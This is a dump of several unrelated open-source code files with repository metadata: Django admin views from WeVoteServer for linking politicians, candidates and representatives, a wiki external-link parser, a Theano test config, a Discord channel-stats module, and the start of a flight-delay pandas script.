Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id)\n )\n linked_representative_list = list(linked_representative_query)\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'LINKED_REPRESENTATIVE_PROBLEM: ' + str(e))\n linked_representative_list = []\n for representative in linked_representative_list:\n if positive_value_exists(representative.id):\n variable_name = \"unlink_representative_\" + str(representative.id) + \"_from_politician\"\n 
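# NOTE (illustrative sketch): the unlink loops above probe request.POST for
# per-row checkbox names like "unlink_candidate_<id>_from_politician". The
# checked ids can also be recovered by scanning the POST keys directly
# (helper name and defaults are hypothetical, for illustration only):
def ids_checked_for_unlink(post_data, prefix='unlink_candidate_',
                           suffix='_from_politician'):
    checked_ids = []
    for key, value in post_data.items():
        if key.startswith(prefix) and key.endswith(suffix) and value:
            checked_ids.append(int(key[len(prefix):-len(suffix)]))
    return checked_ids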
unlink_representative = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(unlink_representative) and positive_value_exists(politician_we_vote_id):\n representative.politician_we_vote_id = None\n representative.politician_id = None\n representative.seo_friendly_path = None\n representative.save()\n\n messages.add_message(request, messages.INFO, 'Representative unlinked.')\n else:\n pass\n\n # ##################################\n # Find Candidates to Link to this Politician\n # Finding Candidates that *might* be \"children\" of this politician\n from politician.controllers import find_candidates_to_link_to_this_politician\n\n related_candidate_list = find_candidates_to_link_to_this_politician(politician=politician_on_stage)\n\n # ##################################\n # Link Candidates to this Politician\n for candidate in related_candidate_list:\n if positive_value_exists(candidate.id):\n variable_name = \"link_candidate_\" + str(candidate.id) + \"_to_politician\"\n link_candidate = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(link_candidate) and positive_value_exists(politician_we_vote_id):\n candidate.politician_id = politician_id\n candidate.politician_we_vote_id = politician_we_vote_id\n candidate.seo_friendly_path = politician_on_stage.seo_friendly_path\n if not positive_value_exists(candidate.vote_usa_politician_id) and \\\n positive_value_exists(vote_usa_politician_id):\n candidate.vote_usa_politician_id = vote_usa_politician_id\n candidate.save()\n # Now update positions\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n candidate_we_vote_id=candidate.we_vote_id,\n new_politician_id=politician_id,\n new_politician_we_vote_id=politician_we_vote_id)\n\n messages.add_message(request, messages.INFO,\n 'Candidate linked, number of positions changed: {number_changed}'\n ''.format(number_changed=results['number_changed']))\n else:\n pass\n\n # ##################################\n # Find Representatives to Link to this Politician\n # Finding Representatives that *might* be \"children\" of this politician\n from politician.controllers import find_representatives_to_link_to_this_politician\n related_representative_list = find_representatives_to_link_to_this_politician(politician=politician_on_stage)\n\n # ##################################\n # Link Representatives to this Politician\n for representative in related_representative_list:\n if positive_value_exists(representative.id):\n variable_name = \"link_representative_\" + str(representative.id) + \"_to_politician\"\n link_representative = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(link_representative) and positive_value_exists(politician_we_vote_id):\n representative.politician_id = politician_id\n representative.politician_we_vote_id = politician_we_vote_id\n representative.seo_friendly_path = politician_on_stage.seo_friendly_path\n if not positive_value_exists(representative.vote_usa_politician_id) and \\\n positive_value_exists(vote_usa_politician_id):\n representative.vote_usa_politician_id = vote_usa_politician_id\n representative.save()\n\n # Update Linked CampaignXs with seo_friendly_path\n if success and positive_value_exists(politician_on_stage.we_vote_id) and \\\n positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n heal_linked_campaignx_variables = True\n campaignx_manager = CampaignXManager()\n campaignx_results = 
campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id,\n )\n if not campaignx_results['success']:\n status += campaignx_results['status']\n status += \"FAILED_TO_RETRIEVE_CAMPAIGNX_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n elif campaignx_results['campaignx_found']:\n campaignx = campaignx_results['campaignx']\n value_changed = False\n if positive_value_exists(campaignx.linked_politician_we_vote_id) \\\n and campaignx.linked_politician_we_vote_id != politician_on_stage.we_vote_id:\n heal_linked_campaignx_variables = False\n if heal_linked_campaignx_variables and positive_value_exists(politician_on_stage.seo_friendly_path) \\\n and campaignx.seo_friendly_path != politician_on_stage.seo_friendly_path:\n # Consider saving politician_on_stage.seo_friendly_path into CampaignXSEOFriendlyPath,\n # so we can maintain connection to this campaignx if the politician_on_stage.seo_friendly_path changes\n # The problem with doing that, is that when we relegate this campaignx to the past, we will have\n # a politician-generated seo_friendly_path linked to a former campaignx, causing a collision.\n # When we unlink campaigns by removing linked_politician_we_vote_id from CampaignX, we will want to\n # generate a new seo_friendly_path for that historical campaignx.\n campaignx.seo_friendly_path = politician_on_stage.seo_friendly_path\n value_changed = True\n messages.add_message(request, messages.INFO, \"Campaignx updated with seo_friendly_path.\")\n if heal_linked_campaignx_variables and not positive_value_exists(campaignx.linked_politician_we_vote_id):\n campaignx.linked_politician_we_vote_id = politician_on_stage.we_vote_id\n value_changed = True\n messages.add_message(request, messages.INFO, \"Campaignx updated with linked_politician_we_vote_id.\")\n if not heal_linked_campaignx_variables:\n messages.add_message(request, messages.ERROR, \"Cannot heal Campaignx linked variables.\")\n\n if value_changed:\n campaignx.save()\n\n # Update Linked Candidates with seo_friendly_path, and\n if success and positive_value_exists(politician_we_vote_id):\n candidate_list_manager = CandidateListManager()\n politician_we_vote_id_list = [politician_we_vote_id]\n candidate_results = candidate_list_manager.retrieve_candidate_list(\n politician_we_vote_id_list=politician_we_vote_id_list,\n )\n if not candidate_results['success']:\n status += candidate_results['status']\n status += \"FAILED_TO_RETRIEVE_CANDIDATES_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n update_list = []\n updates_needed = False\n updates_made = 0\n candidates_to_update_from_politician = []\n if candidate_results['candidate_list_found']:\n now_as_we_vote_date_string = convert_date_to_we_vote_date_string(now())\n now_as_integer = convert_we_vote_date_string_to_date_as_integer(now_as_we_vote_date_string)\n candidate_list = candidate_results['candidate_list']\n for candidate in candidate_list:\n if positive_value_exists(candidate.candidate_ultimate_election_date) \\\n and candidate.candidate_ultimate_election_date > now_as_integer:\n candidates_to_update_from_politician.append(candidate)\n elif positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n candidate.seo_friendly_path = politician_on_stage.seo_friendly_path\n update_list.append(candidate)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n CandidateCampaign.objects.bulk_update(update_list, 
['seo_friendly_path'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} candidates updated with new seo_friendly_path.\"\n \"\".format(updates_made=updates_made))\n if len(candidates_to_update_from_politician) > 0:\n from candidate.controllers import update_candidate_details_from_politician\n for candidate in candidates_to_update_from_politician:\n results = update_candidate_details_from_politician(candidate=candidate, politician=politician_on_stage)\n if results['success'] and results['save_changes']:\n candidate_to_update = results['candidate']\n candidate_to_update.save()\n else:\n status += results['status']\n\n # Update Linked Representatives with seo_friendly_path\n if success and positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n representative_manager = RepresentativeManager()\n politician_we_vote_id_list = [politician_we_vote_id]\n representative_results = representative_manager.retrieve_representative_list(\n politician_we_vote_id_list=politician_we_vote_id_list,\n )\n if not representative_results['success']:\n status += representative_results['status']\n status += \"FAILED_TO_RETRIEVE_REPRESENTATIVES_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n update_list = []\n updates_needed = False\n updates_made = 0\n if representative_results['representative_list_found']:\n representative_list = representative_results['representative_list']\n for representative in representative_list:\n representative.seo_friendly_path = politician_on_stage.seo_friendly_path\n update_list.append(representative)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n Representative.objects.bulk_update(update_list, ['seo_friendly_path'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} representatives updated with new seo_friendly_path.\"\n \"\".format(updates_made=updates_made))\n\n # Update Linked CampaignX with seo_friendly_path (Only if hard-linked)\n if success and positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id) \\\n and positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n # TODO Implement this\n pass\n\n # ####################################################################\n # To make sure we have the freshest data, update supporters_count on all objects\n if positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n from campaign.controllers import create_campaignx_supporters_from_positions, \\\n refresh_campaignx_supporters_count_in_all_children\n campaignx_we_vote_id_list_to_refresh = [politician_on_stage.linked_campaignx_we_vote_id]\n politician_we_vote_id_list = [politician_on_stage.we_vote_id]\n # #############################\n # Create campaignx_supporters\n create_from_friends_only_positions = False\n results = create_campaignx_supporters_from_positions(\n request,\n friends_only_positions=False,\n politician_we_vote_id_list=politician_we_vote_id_list)\n campaignx_we_vote_id_list_changed = results['campaignx_we_vote_id_list_to_refresh']\n if len(campaignx_we_vote_id_list_changed) > 0:\n campaignx_we_vote_id_list_to_refresh = \\\n list(set(campaignx_we_vote_id_list_changed + campaignx_we_vote_id_list_to_refresh))\n if not positive_value_exists(results['campaignx_supporter_entries_created']):\n create_from_friends_only_positions = True\n if create_from_friends_only_positions:\n results = create_campaignx_supporters_from_positions(\n request,\n friends_only_positions=True,\n 
politician_we_vote_id_list=politician_we_vote_id_list)\n campaignx_we_vote_id_list_changed = results['campaignx_we_vote_id_list_to_refresh']\n if len(campaignx_we_vote_id_list_changed) > 0:\n campaignx_we_vote_id_list_to_refresh = \\\n list(set(campaignx_we_vote_id_list_changed + campaignx_we_vote_id_list_to_refresh))\n\n campaignx_manager = CampaignXManager()\n supporter_count = campaignx_manager.fetch_campaignx_supporter_count(\n politician_on_stage.linked_campaignx_we_vote_id)\n results = campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id)\n if results['campaignx_found']:\n campaignx = results['campaignx']\n campaignx.supporters_count = supporter_count\n campaignx.save()\n\n results = refresh_campaignx_supporters_count_in_all_children(\n request,\n campaignx_we_vote_id_list=campaignx_we_vote_id_list_to_refresh)\n if positive_value_exists(results['update_message']):\n update_message += results['update_message']\n\n if positive_value_exists(update_message):\n messages.add_message(request, messages.INFO, update_message)\n\n if politician_id:\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n else:\n return HttpResponseRedirect(reverse('politician:politician_new', args=()))\n\n\n@login_required\ndef politician_retrieve_photos_view(request, candidate_id): # TODO DALE Transition fully to politician\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'admin'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n candidate_id = convert_to_int(candidate_id)\n force_retrieve = request.GET.get('force_retrieve', 0)\n\n candidate_manager = CandidateManager()\n\n results = candidate_manager.retrieve_candidate_from_id(candidate_id)\n if not positive_value_exists(results['candidate_found']):\n messages.add_message(request, messages.ERROR,\n \"Candidate '{candidate_id}' not found.\".format(candidate_id=candidate_id))\n return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))\n\n we_vote_candidate = results['candidate']\n\n display_messages = True\n retrieve_candidate_results = retrieve_candidate_photos(we_vote_candidate, force_retrieve)\n\n if retrieve_candidate_results['status'] and display_messages:\n messages.add_message(request, messages.INFO, retrieve_candidate_results['status'])\n return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))\n\n\n@login_required\ndef politician_delete_process_view(request):\n \"\"\"\n Delete this politician\n :param request:\n :return:\n \"\"\"\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n politician_id = convert_to_int(request.GET.get('politician_id', 0))\n\n # Retrieve this politician\n politician_we_vote_id = ''\n politician_on_stage_found = False\n politician_on_stage = None\n if positive_value_exists(politician_id):\n try:\n politician_query = Politician.objects.filter(id=politician_id)\n if len(politician_query):\n politician_on_stage = politician_query[0]\n politician_we_vote_id = politician_on_stage.we_vote_id\n politician_on_stage_found = True\n except Exception as e:\n messages.add_message(request, 
messages.ERROR, 'Could not find politician -- exception: ' + str(e))\n\n if not politician_on_stage_found:\n messages.add_message(request, messages.ERROR, 'Could not find politician.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n # Are there any positions attached to this politician that should be moved to another instance of this politician?\n if positive_value_exists(politician_id) or positive_value_exists(politician_we_vote_id):\n position_list_manager = PositionListManager()\n candidate_list_manager = CandidateListManager()\n # By not passing in new values, we remove politician_id and politician_we_vote_id\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n politician_id=politician_id,\n politician_we_vote_id=politician_we_vote_id)\n results = candidate_list_manager.update_politician_we_vote_id_in_all_candidates(\n politician_id=politician_id,\n politician_we_vote_id=politician_we_vote_id)\n\n try:\n # Delete the politician\n politician_on_stage.delete()\n messages.add_message(request, messages.INFO, 'Politician deleted.')\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not delete politician -- exception: ' + str(e))\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n\n# This page does not need to be protected.\ndef politicians_sync_out_view(request): # politiciansSyncOut\n status = \"\"\n state_code = request.GET.get('state_code', '')\n politician_search = request.GET.get('politician_search', '')\n\n try:\n politician_query = Politician.objects.using('readonly').all()\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n filters = []\n if positive_value_exists(politician_search):\n new_filter = Q(politician_name__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle2__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle3__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle4__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle5__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url2__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url3__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url4__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url5__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(party__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(we_vote_id__iexact=politician_search)\n filters.append(new_filter)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n politician_query = politician_query.filter(final_filters)\n\n politician_query = politician_query.values(\n 'we_vote_id',\n 'ballotpedia_id',\n 'ballotpedia_politician_name',\n 'ballotpedia_politician_url',\n 
'bioguide_id',\n 'birth_date',\n 'cspan_id',\n 'ctcl_uuid',\n 'date_last_updated',\n 'date_last_updated_from_candidate',\n 'facebook_url',\n 'facebook_url2',\n 'facebook_url3',\n 'facebook_url_is_broken',\n 'facebook_url2_is_broken',\n 'facebook_url3_is_broken',\n 'fec_id',\n 'first_name',\n 'full_name_assembled',\n 'gender',\n 'google_civic_candidate_name',\n 'google_civic_candidate_name2',\n 'google_civic_candidate_name3',\n 'govtrack_id',\n 'house_history_id',\n 'icpsr_id',\n 'instagram_followers_count',\n 'instagram_handle',\n 'is_battleground_race_2019',\n 'is_battleground_race_2020',\n 'is_battleground_race_2021',\n 'is_battleground_race_2022',\n 'is_battleground_race_2023',\n 'is_battleground_race_2024',\n 'is_battleground_race_2025',\n 'is_battleground_race_2026',\n 'last_name',\n 'linked_campaignx_we_vote_id',\n 'linkedin_url',\n 'lis_id',\n 'maplight_id',\n 'middle_name',\n 'opensecrets_id',\n 'political_party',\n 'politician_contact_form_url',\n 'politician_email_address',\n 'politician_email',\n 'politician_email2',\n 'politician_email3',\n 'politician_facebook_id',\n 'politician_googleplus_id',\n 'politician_name',\n 'politician_phone_number',\n 'politician_phone_number2',\n 'politician_phone_number3',\n 'politician_twitter_handle',\n 'politician_twitter_handle2',\n 'politician_twitter_handle3',\n 'politician_twitter_handle4',\n 'politician_twitter_handle5',\n 'politician_url',\n 'politician_url2',\n 'politician_url3',\n 'politician_url4',\n 'politician_url5',\n 'politician_youtube_id',\n 'profile_image_type_currently_active',\n 'seo_friendly_path',\n 'seo_friendly_path_date_last_updated',\n 'state_code',\n 'thomas_id',\n 'twitter_description',\n 'twitter_followers_count',\n 'twitter_handle_updates_failing',\n 'twitter_handle2_updates_failing',\n 'twitter_location',\n 'twitter_name',\n 'twitter_profile_image_url_https',\n 'twitter_profile_background_image_url_https',\n 'twitter_profile_banner_url_https',\n 'twitter_user_id',\n 'vote_smart_id',\n 'vote_usa_politician_id',\n 'vote_usa_profile_image_url_https',\n 'washington_post_id',\n 'we_vote_hosted_profile_facebook_image_url_large',\n 'we_vote_hosted_profile_facebook_image_url_medium',\n 'we_vote_hosted_profile_facebook_image_url_tiny',\n 'we_vote_hosted_profile_image_url_large',\n 'we_vote_hosted_profile_image_url_medium',\n 'we_vote_hosted_profile_image_url_tiny',\n 'we_vote_hosted_profile_twitter_image_url_large',\n 'we_vote_hosted_profile_twitter_image_url_medium',\n 'we_vote_hosted_profile_twitter_image_url_tiny',\n 'we_vote_hosted_profile_uploaded_image_url_large',\n 'we_vote_hosted_profile_uploaded_image_url_medium',\n 'we_vote_hosted_profile_uploaded_image_url_tiny',\n 'we_vote_hosted_profile_vote_usa_image_url_large',\n 'we_vote_hosted_profile_vote_usa_image_url_medium',\n 'we_vote_hosted_profile_vote_usa_image_url_tiny',\n 'wikipedia_id',\n 'wikipedia_url',\n 'youtube_url')\n if politician_query:\n modified_politician_dict_list = []\n politician_dict_list = list(politician_query)\n for one_dict in politician_dict_list:\n birth_date = one_dict.get('birth_date', '')\n if positive_value_exists(birth_date):\n one_dict['birth_date'] = birth_date.strftime('%Y-%m-%d')\n date_last_updated = one_dict.get('date_last_updated', '')\n if positive_value_exists(date_last_updated):\n one_dict['date_last_updated'] = date_last_updated.strftime('%Y-%m-%d %H:%M:%S')\n date_last_updated_from_candidate = one_dict.get('date_last_updated_from_candidate', '')\n if positive_value_exists(date_last_updated_from_candidate):\n 
one_dict['date_last_updated_from_candidate'] = \\\n date_last_updated_from_candidate.strftime('%Y-%m-%d %H:%M:%S')\n seo_friendly_path_date_last_updated = one_dict.get('seo_friendly_path_date_last_updated', '')\n if positive_value_exists(seo_friendly_path_date_last_updated):\n one_dict['seo_friendly_path_date_last_updated'] = \\\n seo_friendly_path_date_last_updated.strftime('%Y-%m-%d %H:%M:%S')\n modified_politician_dict_list.append(one_dict)\n politician_list_json = list(modified_politician_dict_list)\n return HttpResponse(json.dumps(politician_list_json), content_type='application/json')\n except Exception as e:\n status += \"POLITICIAN_LIST_MISSING: \" + str(e) + \" \"\n\n json_data = {\n 'success': False,\n 'status': status\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')\n\n\n@login_required\ndef update_politician_from_candidate_view(request):\n candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')\n politician_id = request.GET.get('politician_id', 0)\n politician_we_vote_id = request.GET.get('politician_we_vote_id', '')\n if not positive_value_exists(politician_id) and not positive_value_exists(politician_we_vote_id):\n message = \"Unable to update politician from candidate. Missing politician_id and we_vote_id.\"\n messages.add_message(request, messages.INFO, message)\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n if positive_value_exists(politician_we_vote_id):\n politician = Politician.objects.get(we_vote_id=politician_we_vote_id)\n else:\n politician = Politician.objects.get(id=politician_id)\n politician_id = politician.id\n politician_we_vote_id = politician.we_vote_id\n\n queryset = CandidateCampaign.objects.using('readonly').all()\n queryset = queryset.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n if positive_value_exists(candidate_we_vote_id):\n queryset = queryset.filter(we_vote_id__iexact=candidate_we_vote_id)\n queryset = queryset.order_by('-candidate_year', '-candidate_ultimate_election_date')\n candidate_list = list(queryset)\n candidate_list_by_politician_we_vote_id = {}\n for one_candidate in candidate_list:\n # Only put the first one in\n if one_candidate.politician_we_vote_id not in candidate_list_by_politician_we_vote_id:\n candidate_list_by_politician_we_vote_id[one_candidate.politician_we_vote_id] = one_candidate\n\n if politician.we_vote_id in candidate_list_by_politician_we_vote_id:\n candidate = candidate_list_by_politician_we_vote_id[politician.we_vote_id]\n results = update_politician_details_from_candidate(politician=politician, candidate=candidate)\n if results['success']:\n save_changes = results['save_changes']\n politician = results['politician']\n if save_changes:\n politician.date_last_updated_from_candidate = localtime(now()).date()\n politician.save()\n message = \"Politician updated.\"\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. No changes found.\"\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. Error: \" + str(results['status'])\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. 
No candidates found to update politician from.\"\n messages.add_message(request, messages.INFO, message)\n\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n\n@login_required\ndef update_politicians_from_candidates_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n status = \"\"\n success = True\n state_code = request.GET.get('state_code', \"\")\n\n politician_list = []\n try:\n queryset = Politician.objects.all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n # Ignore politicians who have been updated in the last 6 months: date_last_updated_from_politician\n today = datetime.now().date()\n six_months = timedelta(weeks=26)\n six_months_ago = today - six_months\n queryset = queryset.exclude(date_last_updated_from_candidate__gt=six_months_ago)\n politician_list = list(queryset[:3000])\n except Exception as e:\n status += \"REPRESENTATIVE_QUERY_FAILED: \" + str(e) + \" \"\n\n # Retrieve all related candidates with one query\n politician_we_vote_id_list = []\n for politician in politician_list:\n if positive_value_exists(politician.we_vote_id):\n if politician.we_vote_id not in politician_we_vote_id_list:\n politician_we_vote_id_list.append(politician.we_vote_id)\n\n candidate_list_by_politician_we_vote_id = {}\n if len(politician_we_vote_id_list) > 0:\n queryset = CandidateCampaign.objects.all()\n queryset = queryset.filter(politician_we_vote_id__in=politician_we_vote_id_list)\n queryset = queryset.order_by('-candidate_year', '-candidate_ultimate_election_date')\n candidate_list = list(queryset)\n for one_candidate in candidate_list:\n # Only put the first one in\n if one_candidate.politician_we_vote_id not in candidate_list_by_politician_we_vote_id:\n candidate_list_by_politician_we_vote_id[one_candidate.politician_we_vote_id] = one_candidate\n\n # Loop through all the politicians in this year, and update them with some politician data\n politician_update_errors = 0\n politicians_updated = 0\n politicians_without_changes = 0\n for we_vote_politician in politician_list:\n if we_vote_politician.we_vote_id in candidate_list_by_politician_we_vote_id:\n candidate = candidate_list_by_politician_we_vote_id[we_vote_politician.we_vote_id]\n else:\n candidate = None\n we_vote_politician.date_last_updated_from_candidate = localtime(now()).date()\n we_vote_politician.save()\n if not candidate or not hasattr(candidate, 'we_vote_id'):\n continue\n results = update_politician_details_from_candidate(politician=we_vote_politician, candidate=candidate)\n if results['success']:\n save_changes = results['save_changes']\n we_vote_politician = results['politician']\n we_vote_politician.date_last_updated_from_candidate = localtime(now()).date()\n we_vote_politician.save()\n if save_changes:\n politicians_updated += 1\n else:\n politicians_without_changes += 1\n else:\n politician_update_errors += 1\n status += results['status']\n\n message = \\\n \"Politicians updated: {politicians_updated:,}. \" \\\n \"Politicians without changes: {politicians_without_changes:,}. \" \\\n \"Politician update errors: {politician_update_errors:,}. 
\" \\\n \"\".format(\n politician_update_errors=politician_update_errors,\n politicians_updated=politicians_updated,\n politicians_without_changes=politicians_without_changes)\n\n messages.add_message(request, messages.INFO, message)\n\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n \"?state_code={state_code}\"\n \"\".format(\n state_code=state_code))\n","repo_name":"wevote/WeVoteServer","sub_path":"politician/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":157825,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"70"}
+{"seq_id":"40144582638","text":"#!/usr/bin/env python3\n\n\"\"\"\nLibrary for parsing external links\n\"\"\"\n\nimport find_block\n\nclass ExternalLinkException(Exception):\n pass\n\ndef external_link_block_processor(link):\n split_link = link.split(\"](\", 1)\n if len(split_link) == 0:\n return link\n link_text = split_link[0]\n link_url = split_link[1]\n if not (\n \"#\" in link_url or \\\n link_url.startswith(\"https\") or \\\n link_url.startswith(\"http\")):\n raise ExternalLinkException\n return (\n \"\" +\n link_text +\n \" \")\n\ndef define():\n return find_block.Block(\n \"[\",\n \")\",\n external_link_block_processor,\n True)\n\n","repo_name":"ncatlab/nlab","sub_path":"script/src/renderer/external_link_block.py","file_name":"external_link_block.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"70"}
+{"seq_id":"18230895837","text":"from __future__ import absolute_import, print_function, division\nfrom nose.plugins.skip import SkipTest\n\nimport theano.sandbox.gpuarray\n\nif theano.sandbox.gpuarray.pygpu is None:\n raise SkipTest(\"pygpu not installed\")\n\nif (not theano.sandbox.gpuarray.pygpu_activated and\n not theano.config.init_gpu_device.startswith('gpu')):\n theano.sandbox.gpuarray.init_dev('cuda')\n\nif not theano.sandbox.gpuarray.pygpu_activated:\n raise SkipTest(\"pygpu disabled\")\n\ntest_ctx_name = None\n\nif theano.config.mode == 'FAST_COMPILE':\n mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpuarray').excluding('gpu')\n mode_without_gpu = theano.compile.mode.get_mode('FAST_RUN').excluding('gpuarray')\nelse:\n mode_with_gpu = theano.compile.mode.get_default_mode().including('gpuarray').excluding('gpu')\n mode_without_gpu = theano.compile.mode.get_default_mode().excluding('gpuarray')\n","repo_name":"mkusner/grammarVAE","sub_path":"Theano-master/theano/sandbox/gpuarray/tests/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"70"}
+{"seq_id":"74101087907","text":"import logging\n\nimport datetime\nimport discord.guild\nimport utils.messages as messages\n\nfrom stats.models import TopChannels, ChannelMessagesCountInfo\n\n\nasync def get_top_channels_text(current_guild_getter, days, limit=10):\n top_channels = await _get_top_channels_info(\n current_guild_getter,\n datetime.datetime.utcnow() - datetime.timedelta(days=days),\n limit\n )\n return messages.make_top_channels_message(top_channels)\n\n\nasync def _get_top_channels_info(current_guild_getter, after: datetime.datetime, limit):\n guild = current_guild_getter()\n text_channels = _get_all_text_channels(guild)\n channels_info = []\n\n for channel in text_channels:\n messages_count = await _get_messages_count(channel, after)\n if messages_count > 0:\n info = ChannelMessagesCountInfo(channel, messages_count)\n channels_info.append(info)\n\n channels_info.sort(key=lambda x: x.messages_count, reverse=True)\n channels_info = channels_info[:limit]\n return TopChannels(channels_info, after)\n\n\ndef _get_all_text_channels(guild: discord.guild):\n text_channel_list = []\n for channel in guild.channels:\n if str(channel.type) == 'text':\n text_channel_list.append(channel)\n return text_channel_list\n\n\nasync def _get_messages_count(channel: discord.channel, after: datetime.datetime):\n messages = await channel.history(after=after).flatten()\n return len(messages)\n","repo_name":"panandafog/stats-bot","sub_path":"stats/text_channels.py","file_name":"text_channels.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12675661172","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport time\nimport matplotlib.pyplot as plt\n\ndef convert_dur(x,y):\n\tif (math.isnan(x) == 1) or (math.isnan(y) == 1):\n\t\treturn np.nan \n\telse:\n\t\treturn datetime.fromtimestamp(y)-datetime.fromtimestamp(x)\n\t\nweather = pd.read_csv(\"2015年5月到2017年5月城市天气.csv\",header=0)\n#action = pd.read_csv(\"2015年5月到2017年5月航班动态数据.txt\",sep=',',header=0)\n#action = pd.read_csv(\"action.csv\",header=0)\naction = pd.read_csv(\"action_2.csv\",header=0)\ncities = pd.read_csv(\"机场城市对应表.csv\",header=0)\nspecial = pd.read_csv(\"2015年5月到2017年5月特情.csv\",header=0)\nsubmission_sample = pd.read_csv(\"submission_sample.csv\",header=0)\n\nweather.columns = ['city','weather','lowtemp','hightemp','date']\n#action.columns = ['dep_port','arr_port','airline','planned_deptime','planned_arrtime','real_deptime','real_arrtime','plane_id','canceled_or_not']\n#mapping = {'正常': 1, '取消': 0}\n#action = action.replace({'canceled_or_not':mapping})\ncities.columns = ['airport','city']\nspecial.columns = ['airport','collect_time','start_time','end_time','content']\n\n# action---------------------\n#action = action.drop_duplicates()\n#\n# the month need to predict is June, and the weather is highly dependent on month in a year, so extract 15th,May ~ 15th,July of 2015 and 2016 historical data only\n'''\nstart_ts1 = int(time.mktime([2015,5,15,0,0,0,0,0,0]))\nend_ts1 = int(time.mktime([2015,7,15,0,0,0,0,0,0]))\nstart_ts2 = int(time.mktime([2016,5,15,0,0,0,0,0,0]))\nend_ts2 = int(time.mktime([2016,7,15,0,0,0,0,0,0]))\nstart_ts3 = int(time.mktime([2017,5,15,0,0,0,0,0,0]))\nend_ts3 = int(time.mktime([2017,7,15,0,0,0,0,0,0]))\nlaction = ((action['planned_deptime'] > start_ts1) & (action['planned_deptime'] < end_ts1)) | ((action['planned_deptime'] > start_ts2) & (action['planned_deptime'] < end_ts2)) | ((action['planned_deptime'] > start_ts3) & (action['planned_deptime'] < end_ts3))\naction = action[laction]\naction = action.drop_duplicates()\naction = 